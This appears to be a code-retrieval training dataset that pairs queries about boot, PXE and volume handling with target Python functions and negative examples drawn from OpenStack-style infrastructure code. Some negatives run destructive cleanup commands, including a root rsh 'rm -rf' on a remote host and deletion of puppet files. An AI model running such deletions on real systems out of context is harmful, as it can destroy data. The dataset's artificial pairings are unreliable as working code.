"def _connect_boot_volume(self, volume, mountpoint, context, instance):\n LOG.debug('Connecting boot volume')\n instance_uuid = instance['uuid']\n volume_id = volume['id']\n\n connector = self.get_volume_connector(instance)\n connection_info = self._initialize_volume_connection(context,\n volume_id,\n connector)\n\n # Check connection_info to determine if the provided volume is\n # local to this compute node. If it is, then don't use it for\n # Solaris branded zones in order to avoid a known ZFS deadlock issue\n # when using a zpool within another zpool on the same system.\n extra_specs = self._get_flavor(instance)['extra_specs'].copy()\n brand = extra_specs.get('zonecfg:brand', ZONE_BRAND_SOLARIS)\n if brand == ZONE_BRAND_SOLARIS:\n driver_type = connection_info['driver_volume_type']\n if driver_type == 'local':\n msg = _(\"Detected 'local' zvol driver volume type \"\n \"from volume service, which should not be \"\n \"used as a boot device for 'solaris' \"\n \"branded zones.\")\n raise exception.InvalidVolume(reason=msg)\n elif driver_type == 'iscsi':\n # Check for a potential loopback iSCSI situation\n data = connection_info['data']\n target_portal = data['target_portal']\n # Strip off the port number (eg. 127.0.0.1:3260)\n host = target_portal.rsplit(':', 1)\n # Strip any enclosing '[' and ']' brackets for\n # IPv6 addresses.\n target_host = host[0].strip('[]')\n\n # Check if target_host is an IP or hostname matching the\n # connector host or IP, which would mean the provisioned\n # iSCSI LUN is on the same host as the instance.\n if target_host in [connector['ip'], connector['host']]:\n msg = _(\"iSCSI connection info from volume \"\n \"service indicates that the target is a \"\n \"local volume, which should not be used \"\n \"as a boot device for 'solaris' branded \"\n \"zones.\")\n raise exception.InvalidVolume(reason=msg)\n # Assuming that fibre_channel is non-local\n elif driver_type != 'fibre_channel':\n # Some other connection type that we don't understand\n # Let zone use some local fallback instead.\n msg = _(\"Unsupported volume driver type '%s' can not be used \"\n \"as a boot device for zones.\" % driver_type)\n raise exception.InvalidVolume(reason=msg)\n\n # Volume looks OK to use. Notify Cinder of the attachment.\n self._volume_api.attach(context, volume_id, instance_uuid, mountpoint)\n return connection_info",
"def bootNodes(self):\n self.libvirt.bootSlaves()",
"def multinic_bootstrap_booting(self):\n self.env.revert_snapshot(\"ready\")\n\n slave = self.env.nodes().slaves[0]\n mac_addresses = [interface.mac_address for interface in\n slave.interfaces.filter(network__name='internal')]\n try:\n for mac in mac_addresses:\n Ebtables.block_mac(mac)\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)\n slave.destroy(verbose=False)\n self.env.nodes().admins[0].revert(\"ready\")\n nailgun_slave = self.env.bootstrap_nodes([slave])[0]\n assert_equal(mac.upper(), nailgun_slave['mac'].upper())\n Ebtables.block_mac(mac)\n finally:\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)",
"def clean_up_instance(self, task):\n manager_utils.node_power_action(task, states.POWER_OFF)\n disable_secure_boot_if_supported(task)\n\n node = task.node\n if (is_directed_lanboot_requested(node) or\n http_utils.is_http_boot_requested(node)):\n # In this cleaning step it sets the URLBOOTFILE & URLBOOTFILE2 &\n # HttpBootUri path as ''.\n sdflex_common.reset_bios_settings(node)\n http_boot_uri = node.driver_info.get('http_boot_uri')\n if http_boot_uri:\n sdflex_object = sdflex_common.get_sdflex_object(node)\n sdflex_object.set_http_boot_uri(None)\n\n if http_utils.is_http_boot_requested(node):\n try:\n images_info = http_utils.get_instance_image_info(task)\n except ironic_exception.MissingParameterValue as e:\n LOG.warning('Could not get instance image info '\n 'to clean up images for node %(node)s: %(err)s',\n {'node': node.uuid, 'err': e})\n else:\n http_utils.clean_up_http_env(task, images_info)\n else:\n super(SdflexPXEBoot, self).clean_up_instance(task)",
"def setup_boot(self):\n\n mission_state_names = list(Enums.mission_states.names())\n nominal_states = mission_state_names\n nominal_states.remove('manual')\n nominal_states.remove('startup')\n nominal_states.remove('safehold')\n nominal_states.remove('initialization_hold')\n\n if self.desired_boot_state in nominal_states:\n self.deployment_hold_length = 100 # Number of cycles for which the satellite will be in a deployment hold. This\n # is an item that is configured on Flight Software.\n self.elapsed_deployment = int(self.flight_controller.read_state(\"pan.deployment.elapsed\"))\n self.max_detumble_cycles = 100 # Number of cycles for which we expect the satellite to be in detumble\n\n # Let's be generous with what angular rate is allowable as \"detumbled.\"\n self.flight_controller.write_state(\"detumble_safety_factor\", 10)\n\n # Prevent ADCS faults from causing transition to initialization hold\n self.flight_controller.write_state(\"adcs_monitor.functional_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel1_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel2_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel3_fault.suppress\", \"true\")\n self.flight_controller.write_state(\"adcs_monitor.wheel_pot_fault.suppress\", \"true\")\n\n self.logger.put(f\"Waiting for the satellite to boot to {self.desired_boot_state}.\")",
"def bootMaster(self):\n self.libvirt.bootMaster()\n time.sleep(100)",
"def efibootmgr_setup(target):\n output = target.shell.run(\"efibootmgr\", output = True)\n bo_regex = re.compile(r\"^BootOrder: \"\n \"(?P<boot_order>([a-fA-F0-9]{4},)*[a-fA-F0-9]{4})$\",\n re.MULTILINE)\n # this one we added before calling this function with \"bootctl\n # install\"\n lbm_regex = re.compile(r\"^Boot(?P<entry>[a-fA-F0-9]{4})\\*? \"\n \"(?P<name>Linux Boot Manager$)\", re.MULTILINE)\n\n # this allows getting metadata from the target that tells us what\n # to look for in the UEFI thing\n uefi_bm_ipv4_entries = [\n \"U?EFI Network.*$\",\n \"UEFI PXEv4.*$\",\n \".*IPv?4.*$\",\n ]\n # FIXME: validate better\n if 'uefi_boot_manager_ipv4_regex' in target.kws:\n uefi_bm_ipv4_entries.append(target.kws[\"uefi_boot_manager_ipv4_regex\"])\n ipv4_regex = re.compile(r\"^Boot(?P<entry>[a-fA-F0-9]{4})\\*? \"\n # PXEv4 is QEMU's UEFI\n # .*IPv4 are some NUCs I've found\n \"(?P<name>(\" + \"|\".join(uefi_bm_ipv4_entries) + \"))\",\n re.MULTILINE)\n bom_m = bo_regex.search(output)\n if bom_m:\n boot_order = bom_m.groupdict()['boot_order'].split(\",\")\n else:\n boot_order = []\n target.report_info(\"current boot_order: %s\" % boot_order)\n lbm_m = lbm_regex.search(output)\n if not lbm_m:\n raise tc.blocked_e(\n \"Cannot find 'Linux Boot Manager' EFI boot entry\",\n dict(target = target, output = output))\n lbm = lbm_m.groupdict()['entry']\n lbm_name = lbm_m.groupdict()['name']\n\n ipv4_m = ipv4_regex.search(output)\n if not ipv4_m:\n raise tc.blocked_e(\n # FIXME: improve message to be more helpful and point to docz\n \"Cannot find IPv4 boot entry, enable manually\",\n dict(target = target, output = output))\n ipv4 = ipv4_m.groupdict()['entry']\n ipv4_name = ipv4_m.groupdict()['name']\n\n # the first to boot has to be ipv4, then linux boot manager\n\n if lbm in boot_order:\n boot_order.remove(lbm)\n if ipv4 in boot_order:\n boot_order.remove(ipv4)\n boot_order = [ ipv4, lbm ] + boot_order\n target.report_info(\"Changing boot order to %s followed by %s\"\n % (ipv4_name, lbm_name))\n target.shell.run(\"efibootmgr -o \" + \",\".join(boot_order))\n if False:\n # DISABLED: seems to get the system confused when it has to do\n # it, so let's use syslinux to always control it\n # Next time we reboot we want to go straight to our deployment\n target.report_info(\"Setting next boot to be Linux Boot Manager\")\n target.shell.run(\"efibootmgr -n \" + lbm)",
"def prepare_ramdisk(self, task, ramdisk_params):\n node = task.node\n\n # Label indicating a deploy or rescue operation being carried out on\n # the node, 'deploy' or 'rescue'. Unless the node is in a rescue like\n # state, the mode is set to 'deploy', indicating deploy operation is\n # being carried out.\n mode = deploy_utils.rescue_or_deploy_mode(node)\n\n if self.ipxe_enabled:\n # NOTE(mjturek): At this point, the ipxe boot script should\n # already exist as it is created at startup time. However, we\n # call the boot script create method here to assert its\n # existence and handle the unlikely case that it wasn't created\n # or was deleted.\n pxe_utils.create_ipxe_boot_script()\n\n # Generate options for both IPv4 and IPv6, and they can be\n # filtered down later based upon the port options.\n # TODO(TheJulia): This should be re-tooled during the Victoria\n # development cycle so that we call a single method and return\n # combined options. The method we currently call is relied upon\n # by two eternal projects, to changing the behavior is not ideal.\n dhcp_opts = pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=4)\n dhcp_opts += pxe_utils.dhcp_options_for_instance(\n task, ipxe_enabled=self.ipxe_enabled, ip_version=6)\n provider = dhcp_factory.DHCPFactory()\n provider.update_dhcp(task, dhcp_opts)\n\n pxe_info = pxe_utils.get_image_info(node, mode=mode,\n ipxe_enabled=self.ipxe_enabled)\n\n # NODE: Try to validate and fetch instance images only\n # if we are in DEPLOYING state.\n if node.provision_state == states.DEPLOYING:\n pxe_info.update(\n pxe_utils.get_instance_image_info(\n task, ipxe_enabled=self.ipxe_enabled))\n\n boot_mode_utils.sync_boot_mode(task)\n\n pxe_options = pxe_utils.build_pxe_config_options(\n task, pxe_info, ipxe_enabled=self.ipxe_enabled,\n ramdisk_params=ramdisk_params)\n # TODO(dtantsur): backwards compability hack, remove in the V release\n if ramdisk_params.get(\"ipa-api-url\"):\n pxe_options[\"ipa-api-url\"] = ramdisk_params[\"ipa-api-url\"]\n\n if self.ipxe_enabled:\n pxe_config_template = deploy_utils.get_ipxe_config_template(node)\n else:\n pxe_config_template = deploy_utils.get_pxe_config_template(node)\n\n pxe_utils.create_pxe_config(task, pxe_options,\n pxe_config_template,\n ipxe_enabled=self.ipxe_enabled)\n manager_utils.node_set_boot_device(task, boot_devices.PXE,\n persistent=False)\n\n if self.ipxe_enabled and CONF.pxe.ipxe_use_swift:\n kernel_label = '%s_kernel' % mode\n ramdisk_label = '%s_ramdisk' % mode\n pxe_info.pop(kernel_label, None)\n pxe_info.pop(ramdisk_label, None)\n\n if pxe_info:\n pxe_utils.cache_ramdisk_kernel(task, pxe_info,\n ipxe_enabled=self.ipxe_enabled)\n\n LOG.debug('Ramdisk (i)PXE boot for node %(node)s has been prepared '\n 'with kernel params %(params)s',\n {'node': node.uuid, 'params': pxe_options})",
"def _create_boot_volume(self, context, instance):\n LOG.debug('Creating boot volume')\n boot_vol_az = CONF.solariszones.boot_volume_az\n boot_vol_type = CONF.solariszones.boot_volume_type\n try:\n vol = self._volume_api.create(\n context, instance['root_gb'],\n instance['hostname'] + \"-\" + self._rootzpool_suffix,\n \"Boot volume for instance '%s' (%s)\"\n % (instance['name'], instance['uuid']),\n volume_type=boot_vol_type, availability_zone=boot_vol_az)\n # TODO(npower): Polling is what nova/compute/manager also does when\n # creating a new volume, so we do likewise here.\n while True:\n volume = self._volume_api.get(context, vol['id'])\n if volume['status'] != 'creating':\n return volume\n greenthread.sleep(1)\n\n except Exception as reason:\n LOG.exception(_(\"Unable to create root zpool volume for instance \"\n \"'%s': %s\") % (instance['name'], reason))\n raise",
"def boot_installer(self):\n boot_timeout = int(config.get('iso_installer', 'BOOT_TIMEOUT'))\n self.child.expect('Escape character')\n LOG.info('connected to the VM (controller-0)')\n # send a escape character\n self.child.sendline('\\x1b')\n self.child.expect('boot:')\n cmd_boot_line = common.get_cmd_boot_line()\n self.child.sendline(cmd_boot_line)\n LOG.info('kernel command line sent: %s', cmd_boot_line)\n # send a enter character\n self.child.sendline('\\r')\n # setting a boot timeout\n self.child.timeout = boot_timeout\n self.child.expect('Loading vmlinuz')\n LOG.info('Loading vmlinuz')\n self.child.expect('Loading initrd.img')\n LOG.info('Loading initrd.img')\n self.child.expect('Starting installer, one moment...')\n LOG.info('Starting installer ...')\n self.child.expect('Performing post-installation setup tasks')\n LOG.info('Performing post-installation setup tasks')",
"def preprocess_hostOS_OS_boot(parser):\n if not FTOS.is_running(parser[\"PrimaryOS_name\"]):\n if FTOS.is_shutdown(parser[\"PrimaryOS_name\"]):\n status = FTOS.boot(parser[\"PrimaryOS_name\"])\n if status != \"success\":\n raise TA_error.Preprocess_Error(\"PrimaryOS OS boot command fail\")\n time.sleep(float(parser[\"pre_hostOS_boot_time\"]))\n if not FTOS.is_running(parser[\"PrimaryOS_name\"]):\n raise TA_error.Preprocess_Error(\"PrimaryOS OS can not boot\")",
"def default_pxeboot_config(self):\n\n # Use private subnet for pxe booting\n self.separate_pxeboot_network = False\n self.pxeboot_subnet = self.private_pxeboot_subnet\n self.controller_pxeboot_floating_address = \\\n IPAddress(self.pxeboot_subnet[2])\n self.controller_pxeboot_address_0 = \\\n IPAddress(self.pxeboot_subnet[3])\n self.controller_pxeboot_address_1 = \\\n IPAddress(self.pxeboot_subnet[4])\n\n self.pxeboot_start_address = self.pxeboot_subnet[2]\n self.pxeboot_end_address = self.pxeboot_subnet[-2]",
"async def pre_bootstrap(msg_cb):\n\n # Set provider type for post-bootstrap\n app.env['JUJU_PROVIDERTYPE'] = juju.get_cloud_types_by_name()[\n app.current_cloud]\n app.env['JUJU_CONTROLLER'] = app.current_controller\n app.env['JUJU_MODEL'] = app.current_model\n app.env['CONJURE_UP_SPELLSDIR'] = app.argv.spells_dir\n\n await utils.run_step('00_pre-bootstrap',\n 'pre-bootstrap',\n msg_cb)",
"def _power_on(self, instance, network_info):\n name = instance['name']\n zone = self._get_zone_by_name(name)\n if zone is None:\n raise exception.InstanceNotFound(instance_id=name)\n\n # Attempt to update the zones hostid in the instance data, to catch\n # those instances that might have been created without a hostid stored.\n self._set_instance_metahostid(instance)\n\n bootargs = []\n if CONF.solariszones.solariszones_boot_options:\n reset_bootargs = False\n persistent = 'False'\n\n # Get any bootargs already set in the zone\n cur_bootargs = utils.lookup_resource_property(zone, 'global', 'bootargs')\n\n # Get any bootargs set in the instance metadata by the user\n meta_bootargs = instance.metadata.get('bootargs')\n\n if meta_bootargs:\n bootargs = ['--', str(meta_bootargs)]\n persistent = str(\n instance.metadata.get('bootargs_persist', 'False'))\n if cur_bootargs is not None and meta_bootargs != cur_bootargs:\n with ZoneConfig(zone) as zc:\n reset_bootargs = True\n # Temporarily clear bootargs in zone config\n zc.clear_resource_props('global', ['bootargs'])\n\n try:\n zone.boot(bootargs)\n self._plug_vifs(instance, network_info)\n except Exception as ex:\n reason = utils.zonemgr_strerror(ex)\n LOG.exception(_(\"Unable to power on instance '%s' via \"\n \"zonemgr(3RAD): %s\") % (name, reason))\n raise exception.InstancePowerOnFailure(reason=reason)\n finally:\n if CONF.solariszones.solariszones_boot_options:\n if meta_bootargs and persistent.lower() == 'false':\n # We have consumed the metadata bootargs and\n # the user asked for them not to be persistent so\n # clear them out now.\n instance.metadata.pop('bootargs', None)\n instance.metadata.pop('bootargs_persist', None)\n\n if reset_bootargs:\n with ZoneConfig(zone) as zc:\n # restore original boot args in zone config\n zc.setprop('global', 'bootargs', cur_bootargs)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Cleans up the boot of instance. This method cleans up the PXE / HTTP environment that was setup for booting the instance. It unlinks the instance kernel/ramdisk in the node's directory in tftproot / httproot and removes it's PXE config / HTTP config. In case of Directed LAN Boot / UEFI HTTP Boot BIOS setting are reset. In case of UEFI iSCSI booting, it cleans up iSCSI target information from the node. Secure boot is also disabled if it was set earlier during provisioning of the ironic node.
|
def clean_up_instance(self, task):
manager_utils.node_power_action(task, states.POWER_OFF)
disable_secure_boot_if_supported(task)
node = task.node
if (is_directed_lanboot_requested(node) or
http_utils.is_http_boot_requested(node)):
# In this cleaning step it sets the URLBOOTFILE & URLBOOTFILE2 &
# HttpBootUri path as ''.
sdflex_common.reset_bios_settings(node)
http_boot_uri = node.driver_info.get('http_boot_uri')
if http_boot_uri:
sdflex_object = sdflex_common.get_sdflex_object(node)
sdflex_object.set_http_boot_uri(None)
if http_utils.is_http_boot_requested(node):
try:
images_info = http_utils.get_instance_image_info(task)
except ironic_exception.MissingParameterValue as e:
LOG.warning('Could not get instance image info '
'to clean up images for node %(node)s: %(err)s',
{'node': node.uuid, 'err': e})
else:
http_utils.clean_up_http_env(task, images_info)
else:
super(SdflexPXEBoot, self).clean_up_instance(task)
|
[
"def clean_up_instance(self, task):\n manager_utils.node_power_action(task, states.POWER_OFF)\n disable_secure_boot_if_supported(task)\n\n node = task.node\n\n sdflex_common.reset_network_setting_dhcpless_boot(node)\n image_utils.cleanup_iso_image(task)",
"def wipe_puppet(self):\n # TODO IMPLEMENT THIS METHOD\n self.clean_setup()",
"def clean_up_ramdisk(self, task):\n LOG.debug(\"Cleaning up deploy boot for \"\n \"%(node)s\", {'node': task.node.uuid})\n\n sdflex_common.eject_vmedia(task,\n vmedia_device)\n self._cleanup_iso_image(task)",
"def cleanup(self):\n if not self.status:\n self.class_logger.info(\"Skip cleanup of switch id:%s due to Off status.\" % (self.id, ))\n return\n self.get()\n self.clearconfig()",
"def node_cleanup(self):\n LOG.debug(\"Running node cleanup.\")\n # nodetool -h <HOST> -p <PORT> -u <USER> -pw <PASSWORD> cleanup\n try:\n self._run_nodetool_command('cleanup')\n self.status.set_status(rd_instance.ServiceStatuses.RUNNING)\n except Exception:\n LOG.exception(\"The node failed to complete its cleanup.\")\n finally:\n self.status.end_restart()",
"def clean_up_ramdisk(self, task):\n node = task.node\n mode = deploy_utils.rescue_or_deploy_mode(node)\n try:\n images_info = pxe_utils.get_image_info(\n node, mode=mode, ipxe_enabled=self.ipxe_enabled)\n except exception.MissingParameterValue as e:\n LOG.warning('Could not get %(mode)s image info '\n 'to clean up images for node %(node)s: %(err)s',\n {'mode': mode, 'node': node.uuid, 'err': e})\n else:\n pxe_utils.clean_up_pxe_env(\n task, images_info, ipxe_enabled=self.ipxe_enabled)",
"def remove(self):\n\t\tc = Common()\n\t\tc.banner()\n\t\tc.client_hosts()\n\n\t\toperatingSystem = run(\"/bin/cat /etc/issue | /usr/bin/awk '{print $1}'\")\n\n\t\tif(operatingSystem=='Debian'):\n\t\t\trun('aptitude -y purge puppet')\n\t\t\trun('find /var/lib/puppet -type f -print0 | xargs -0r rm')\n\t\telse:\n\t\t\tprint '--->\\tOS not supported'\n\t\t\tsys.exit(0)\n\n\t\ttry:\n\t\t\tsubprocess.call(['/usr/sbin/puppetca', '--clean', '%s.%s' % (c.client_name(),self.domain)])\n\t\texcept Exception, e:\n\t\t\tprint 'error :', e\n\t\t\tpass\n\n\t\tsleep(3)\n\t\texit(0)",
"def cleanup_files(self):\n os.system(\"rm -r /tmp/kernelpop\")",
"def shutdown(self):\n self.commands[master_setup.subcommand].shutdown()",
"def _remove_pxe_config(self, host):\n if host.mgmt_mac:\n dashed_mac = host.mgmt_mac.replace(\":\", \"-\")\n\n # Remove the old file if it exists\n try:\n os.remove(\"/var/pxeboot/pxelinux.cfg/01-\" + dashed_mac)\n except OSError:\n pass\n\n try:\n os.remove(\"/var/pxeboot/pxelinux.cfg/efi-01-\" + dashed_mac + \".cfg\")\n os.remove(\"/var/pxeboot/pxelinux.cfg/efi-01-\" + dashed_mac)\n except OSError:\n pass",
"def prepare_instance(self, task):\n # Need to enable secure boot, if being requested.\n # update_secure_boot_mode checks and enables secure boot only if the\n # deploy has requested secure boot\n boot_option = deploy_utils.get_boot_option(task.node)\n if boot_option != \"kickstart\":\n sdflex_common.update_secure_boot_mode(task, True)\n if not http_utils.is_http_boot_requested(task.node):\n if boot_option == \"kickstart\":\n prepare_node_for_deploy(task)\n super(SdflexPXEBoot, self).prepare_instance(task)\n else:\n boot_mode_utils.sync_boot_mode(task)\n node = task.node\n boot_option = deploy_utils.get_boot_option(node)\n boot_device = None\n instance_image_info = {}\n if boot_option == \"ramdisk\":\n instance_image_info = http_utils.get_instance_image_info(task)\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n if deploy_utils.is_iscsi_boot(task) or boot_option == \"ramdisk\":\n http_utils.prepare_instance_http_config(\n task, instance_image_info,\n iscsi_boot=deploy_utils.is_iscsi_boot(task),\n ramdisk_boot=(boot_option == \"ramdisk\"))\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n elif boot_option != \"local\":\n if task.driver.storage.should_write_image(task):\n # Make sure that the instance kernel/ramdisk is cached.\n # This is for the takeover scenario for active nodes.\n instance_image_info = (\n http_utils.get_instance_image_info(task))\n http_utils.cache_ramdisk_kernel(task, instance_image_info)\n iwdi = (\n task.node.driver_internal_info.get('is_whole_disk_image'))\n try:\n root_uuid_or_disk_id = task.node.driver_internal_info[\n 'root_uuid_or_disk_id'\n ]\n except KeyError:\n if not task.driver.storage.should_write_image(task):\n pass\n elif not iwdi:\n LOG.warning(\"The UUID for the root partition can't be\"\n \" found, unable to switch the pxe config \"\n \"from deployment mode to service (boot) \"\n \"mode for node %(node)s\",\n {\"node\": task.node.uuid})\n else:\n LOG.warning(\"The disk id for the whole disk image \"\n \"can't be found, unable to switch the \"\n \"pxe config from deployment mode to \"\n \"service (boot) mode for node %(node)s. \"\n \"Booting the instance from disk.\",\n {\"node\": task.node.uuid})\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n else:\n http_utils.build_service_http_config(task,\n instance_image_info,\n root_uuid_or_disk_id)\n if http_utils.is_http_boot_requested(task.node):\n boot_device = boot_devices.UEFIHTTP\n else:\n boot_device = boot_devices.PXE\n else:\n # If it's going to boot from the local disk, we don't need\n # PXE config files. They still need to be generated as part\n # of the prepare() because the deployment does PXE boot the\n # deploy ramdisk\n http_utils.clean_up_http_config(task)\n boot_device = boot_devices.DISK\n\n # NOTE(pas-ha) do not re-set boot device on ACTIVE nodes\n # during takeover\n if boot_device and task.node.provision_state != states.ACTIVE:\n persistent = True\n if node.driver_info.get('force_persistent_boot_device',\n 'Default') == 'Never':\n persistent = False\n manager_utils.node_set_boot_device(task, boot_device,\n persistent=persistent)",
"def cleanDynagen(self):\n\n self.dynagen.dynamips.clear()\n self.dynagen.handled = False\n self.dynagen.devices.clear()\n self.dynagen.globalconfig.clear()\n self.dynagen.configurations.clear()\n self.dynagen.ghosteddevices.clear()\n self.dynagen.ghostsizes.clear()\n self.dynagen.bridges.clear()\n self.dynagen.autostart.clear()\n\n for dynamips in globals.GApp.dynagen.dynamips.values():\n try:\n dynamips.reset()\n except:\n continue\n\n if globals.GApp.HypervisorManager:\n globals.GApp.HypervisorManager.stopProcHypervisors()\n if globals.GApp.QemuManager:\n globals.GApp.QemuManager.stopQemu()",
"def cleanup(self):\n\n self.snmp_requester.cleanup()",
"def cleanupServer(self):\n if self._serverProc is not None:\n self._client(\"killServer\")\n if isinstance(self._serverProc, subprocess.Popen):\n self._serverProc.communicate()\n self._devnull.close()\n self.callCmd(\n [\"rsh\", \"-l\", \"root\", self._remoteHost,\n \"rm -rf /var/tmp/bcpython /var/lib/python2.7\"])\n self._serverProc = None",
"def cleanup(self):\n self.log.debug('template_igt - in template_igt cleanup()')\n # Add resource setup code here",
"def multinic_bootstrap_booting(self):\n self.env.revert_snapshot(\"ready\")\n\n slave = self.env.nodes().slaves[0]\n mac_addresses = [interface.mac_address for interface in\n slave.interfaces.filter(network__name='internal')]\n try:\n for mac in mac_addresses:\n Ebtables.block_mac(mac)\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)\n slave.destroy(verbose=False)\n self.env.nodes().admins[0].revert(\"ready\")\n nailgun_slave = self.env.bootstrap_nodes([slave])[0]\n assert_equal(mac.upper(), nailgun_slave['mac'].upper())\n Ebtables.block_mac(mac)\n finally:\n for mac in mac_addresses:\n Ebtables.restore_mac(mac)",
"def shutdown(self):\n if self.ipkernel is not None:\n self.cleanup_consoles()\n self.ipkernel.shell.exit_now = True\n self.ipkernel.cleanup_connection_file()\n self.ipkernel.iopub_thread.stop()\n self.ipkernel = None",
"def shutdown(self):\n self._exec_cmd(_vix.VixVM_PowerOff,\n self._vm_handle,\n VIX_VMPOWEROP_FROM_GUEST,\n None,\n None\n )",
"def cleanup(self):\n os.system(\"rm -rf /dev/shm/images/kinect_rgb\")\n os.system(\"rm -rf /dev/shm/images/kinect_depth\")"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Initialize the SdflexRedfish Virtual Media Boot interface.
|
def __init__(self):
super(SdflexRedfishVirtualMediaBoot, self).__init__()
if not sushy:
raise ironic_exception.DriverLoadError(
driver='sdfelx-redfish',
reason=_('Unable to import the sushy library'))
|
[
"def init(verbose):\n\n\tif verbose:\n\t\tlog.basicConfig(format=\"%(levelname)s: %(message)s\", level=log.DEBUG)\n\telse:\n\t\tlog.basicConfig(format=\"%(levelname)s: %(message)s\")\n\n\tlog.info(\"Initializing SmartSpa subsystems.\")\n\n\tglobal real_time_config\n\treal_time_config = Config(\"real_time\")\n\n\tinit_sensing()\n\tinit_hardware()\n\tinit_control()\n\tinit_system()\n\tinit_ui()\n\tinit_db()",
"def InitDevice(self):\n # No need to init the device.\n pass",
"def init_vm(self):\n self.r2api.init_vm()\n self.did_init_vm = True",
"def init_sdr():\n\n LOGGER.info(\"Performing SDR initialisation on application startup\")\n sdr.start(samples_callback=spectrum_density_estimator(broadcast))",
"def __init__(self, vm_spec):\n super(WindowsGceVirtualMachine, self).__init__(vm_spec)\n self.boot_metadata['windows-startup-script-ps1'] = (\n windows_virtual_machine.STARTUP_SCRIPT\n )",
"def __init__(self, *args, **kwargs):\n q.logger.log(\"Mounting file system\")\n super(MemFS, self).__init__(*args, **kwargs)",
"def __init__(self, visible=0, size=(1920, 1080)):\n self.display = Display(visible=visible, size=size)\n log.info(\"Virtual display set up, visible: {}, size: {}\".\n format(False if not visible else True, size))\n self.display.start()\n time.sleep(1)",
"def VISA_init():\n return hv_base.VISA_init()",
"def setupBootRegion(self):\n self.virtualMemoryRequest(\n \"PhysicalRegion\",\n {\n \"RegionType\": \"BootRegion\",\n \"Size\": PcConfig.get_boot_region_size(),\n \"Type\": \"I\",\n \"Bank\": 0,\n },\n )",
"def __init__(self, svariant=''):\r\n # Call the Super Class Constructor\r\n GnuArmDevice.__init__(self, 'LPC11U68')\r\n\r\n # Load the Specifics\r\n self.svariant = svariant\r\n self.defines = ['TARGET_LPC11U68', 'TOOLCHAIN_GCC_ARM', '__CORTEX_M0_PLUS']\r\n self.libs = ['gcc', 'c', 'nosys']\r\n self.ldfile = 'LPC11U24.ld'\r\n self.ldpath = 'LPC11U24'\r\n self.package = 'armld/LPC11U24.7z'\r\n self.flash = 256\r\n self.ram = 32\r\n self.eeprom = 4\r\n self.arch = CPU_CORTEXM0PLUS",
"def __init__(self,\n mount_type='PERSISTENT',\n mode='READ_WRITE',\n disk=None,\n device_name=None,\n boot=False,\n source=None,\n init_disk_name=None,\n init_disk_size=None,\n init_disk_image=None,\n init_disk_project=None,\n auto_delete=True):\n self.mount_type = mount_type\n self.mode = mode\n if type(disk) is Disk:\n self.disk = disk\n else:\n self.disk = None\n self.device_name = device_name\n self.boot = boot\n self.source = source\n self.init_disk_name = init_disk_name\n self.init_disk_size = init_disk_size\n self.init_disk_image = init_disk_image\n self.init_disk_project = init_disk_project\n self.auto_delete = auto_delete",
"def __init__(self, svariant=''):\r\n # Call the Super Class Constructor\r\n GnuArmDevice.__init__(self, 'LPC11U24')\r\n\r\n # Load the Specifics\r\n self.svariant = svariant\r\n self.defines = ['TARGET_LPC11U24', 'TOOLCHAIN_GCC_ARM', '__CORTEX_M0']\r\n self.libs = ['gcc', 'c', 'nosys']\r\n self.ldfile = 'LPC11U24.ld'\r\n self.ldpath = 'LPC11U24'\r\n self.package = 'armld/LPC11U24.7z'\r\n self.flash = 32\r\n self.ram = 8\r\n self.eeprom = 4\r\n self.arch = CPU_CORTEXM0",
"def bootMaster(self):\n self.libvirt.bootMaster()\n time.sleep(100)",
"def __init__(self):\n self._red_led = pyb.LED(1) # Turns led on (red color)\n self._red_led.on()\n # Setup sensor settings\n # https://docs.openmv.io/library/omv.sensor.html#constants\n sensor.reset()\n sensor.set_vflip(True) # Reverse image on vertical axis\n sensor.set_hmirror(True) # Reverse image on horizontal axis\n sensor.set_pixformat(sensor.RGB565)\n sensor.set_framesize(sensor.QVGA)\n sensor.set_auto_gain(False) # Must be turned off for color tracking\n # Must be turned off for color tracking\n sensor.set_auto_whitebal(False)",
"def __init__(self, description : dict):\n super().__init__(description)\n if 'parameters' in description:\n populate_params(self, description['parameters'])\n else:\n warnings.warn(\"Please use an hwh file with the SD-FEC driver\"\n \" - the default configuration is being used\")\n self._config = _lib.XSdFecLookupConfig(0)\n # TODO consider how we should set default LDPC and Turbo code params\n self._instance = _ffi.new(\"XSdFec*\")\n self._config.BaseAddress = self.mmio.array.ctypes.data\n _lib.XSdFecCfgInitialize(self._instance, self._config)",
"def initialize(self):\n self.initialized = False\n self.initialize_cameras()\n self.initialize_electronics()\n self.initialized = True",
"def __init__(self, event_loop=None):\n super().__init__('/dev/dri/card0', event_loop)",
"def initializeWaveplate(self):\n\n self.statusReport('Initialize Waveplate')\n if self.waveIni == 1:\n return\n self.waveIni = 1\n self.Waveplate = StageCommunication('GROUP3', 'POSITIONER')\n self.Waveplate.connectStage()\n self.Waveplate.searchForHome()\n self.Waveplate.getCurrPos()",
"def initialize_framing(self):\n if self.connection_mode == \"ETHERNET\":\n self.sut_adapter = EthernetAdapter.EthernetAdapter()\n\n if self.sut_mac != \"\":\n self.sut_adapter.dut_mac = self.sut_mac\n else:\n self.sut_adapter.sut_ip = self.sut_ip\n\n self.sut_adapter.sut_interface = self.sut_interface\n\n self.sut_adapter.start()\n\n self.seq_nr = 1\n \n self.initialized = True"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Returns the boot iso image name for a given node.
|
def _get_iso_image_name(node):
return "boot-%s.iso" % node.uuid
|
[
"def get_name() -> str:\n return platform.node()",
"def get_img_name(self):\n\n name = self.img\n idx = name.rindex(\".\")\n return name[:idx]",
